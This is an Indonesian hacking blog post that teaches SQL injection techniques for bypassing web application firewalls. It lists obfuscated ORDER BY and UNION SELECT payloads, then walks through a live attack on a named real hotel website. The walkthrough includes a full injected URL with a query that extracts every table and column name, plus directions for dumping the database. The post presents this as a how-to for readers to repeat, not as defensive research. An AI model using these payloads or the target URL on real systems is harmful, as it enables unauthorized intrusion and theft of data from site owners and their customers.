SQL Injection Bypass WAF

 Halo hamker hamker sekalian

Kali ini gw (Rev) bakal share tentang macam macam bypass di sql injection. Sesuai lanjutan materi tentang SQL Injection kita lanjut ke bagian ini.

Setelah kita udah paham tentang basic sql injection, kita terkadang jumpa dengan web yang ngeselin, kayak ketika waktu mengorder by , kadang 403 forbidden, not acceptable dan lain nya. Nah kali ini gw mau bagiin cara membypass WAF di sql injection itu.

WAF atau Web Application Firewall berguna sebagai firewall security web untuk keamanan umum. Jadi, bisa dibilang web yang rata rata udah dipasangin waf itu udah kebal yang namanya dengan sql injection basic atau dengan statement error karakter (') atau (/**).

Oke deh ini dia sedikit macam macam bypass dalam sql injection, kenapa sedikit ?Karena yang banyak kalian bisa lihat di https://pastebin.com/raw/YjxeFagh


{ ORDER BY }

 

/**/ORDER/**/BY/**/

/*!order*/+/*!by*/

/*!ORDER BY*/

/*!50000ORDER BY*/

/*!50000ORDER*//**//*!50000BY*/

/*!12345ORDER*/+/*!BY*/


[~] UNION select [~]


/*!50000%55nIoN*/ /*!50000%53eLeCt*/

%55nion(%53elect 1,2,3)-- -

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/UNION/**//*!50000SELECT*//**/

/*!50000UniON SeLeCt*/

union /*!50000%53elect*/
/*!50000union*/+/*!50000select*/


Masih banyak sebenernya cuma nanti aja buat post selanjutnya, kalo ini emang bener bener udah bisa baru w post selanjutnya.

Segitu dulu nanti minggu depan w kasi semuanya sama dios diosnya

Sekarang kita bakal coba pada suatu web yang terdapat WAF nya, web nya ialah :
https://intourhotels.com.sa/en/dining.php?id=1

Cara awal inject sama aja kyk yang basic ORDER BY, jadi w gk perlu jelasin lagi tentangORDER BY nya, karena WAF nya gk ada disitu, adanya di UNION jadi langsung ke UNION aja.


https://intourhotels.com.sa/en/dining.php?id=1+order+by+10--+ > Error
https://intourhotels.com.sa/en/dining.php?id=1+order+by+9--+ > Normal
Tau kan harus ambil yg mana

langsung ke Union



Nah pas +union+all+select+1,2,3,4,5,6,7,8,9--+ tampilannya begitu, ini lah salah satu tampilan WAF, kita coba bypass dengan query yg diatas kita ambil salah satu yang /*!50000union*/+/*!50000select*/

jangan lupa taro - sebelum parameter jadi
https://intourhotels.com.sa/en/dining.php?id=-1+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9--+
maka tampilannya kembali normal



 

yess disini kita sudah berhasil membypassnya, lanjut ...
Muncul nomor togel 3 yaudah taro dios disitu, karena ini WAF jadi Diosnya juga WAF, pake DIOS yang kemarin di Basic SQL Injection pasti gk bakal bisa,
Ni w kasi DIOS w :

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

maka BOOM

Ni w kasi Full Query nya takut gk pada paham, pahamin sendiri, atau nanya silahkan...
Nanya aja di Grup ok

https://intourhotels.com.sa/en/dining.php?id=-1+/*!50000union*/+/*!50000select*/+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),4,5,6,7,8,9--+


mau Dump Database ?
Sama aja kyk biasanya Concat(table_name) . . . +from+colomn_name--+
Berhubung ini WAF maka Concatnya di Bypass juga jadi /*!50000Concat*/(table_name) . . . +from+colomn_name--+

masi gk bisa ? lu berarti ada yg salah w juga bisa
kalo masi lupa liat basic SQL Injection yang pertama w Post

Segitu aja dari w kalo da kesalahan mohon maaf dan tolong dikoreksi, Silahkan diskusi di kolom komentar/di grup.
Thanks


SHARE THIS

Author:

Latest
Next Post